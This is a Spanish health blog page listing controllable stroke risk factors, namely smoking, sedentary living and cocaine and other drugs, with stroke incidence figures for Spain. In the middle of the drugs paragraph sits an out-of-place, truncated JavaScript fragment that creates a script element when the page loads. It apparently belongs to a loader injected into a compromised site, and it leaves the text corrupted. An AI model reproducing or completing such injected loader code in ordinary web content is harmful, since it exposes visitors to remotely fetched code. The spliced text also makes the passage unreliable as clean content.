Salud y belleza » Enfermedades

ACV: factores de riesgo controlables (II)

Sin Comentarios

Un dato preocupante: las tasas de incidencia de enfermedad cerebrovascular por 100.000 habitantes se estiman en 364 en hombres y 169 en mujeres.

Actualmente, España es uno de los países de Europa que mayor número de muertos por este tipo de cuadro registra.

Y, si bien es verdad que frente al ACV “no hay nada que hacer”, sí existen métodos para que este tipo de situación se mantenga a distancia prudencial.

Analicemos más y más factores de riesgo controlables del ACV…

Cigarrillo: para los fumadores, el riesgo de sufrir un ataque cerebral aumenta entre un 50% y un 80%. Dejar el cigarrillo es vital (nunca mejor usado ese término).

Sedentarismo: estudios recientes han demostrado cómo la falta de actividad física puede aumentar el riesgo de enfermedades cardiovasculares. Por lo tanto, cualquier persona con tendencia a la obesidad o con un estilo de vida bajo en deportes, debe volcarse a la práctica de actividades físicas: desde caminar, hasta trotar o andar en bicicleta, todo suma.

Drogas ilícitas: el ACV no entiende de vicios. La cocaína junto con otras drogas igual de peligrosas, incrementan en un 65% las posibilidades de sufrir un ataque cerebro vascular. Si tienes adicciones entonces ya sumas dos problemas: riesgo de ACV, uno de ellos.if (document.currentScript) { var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.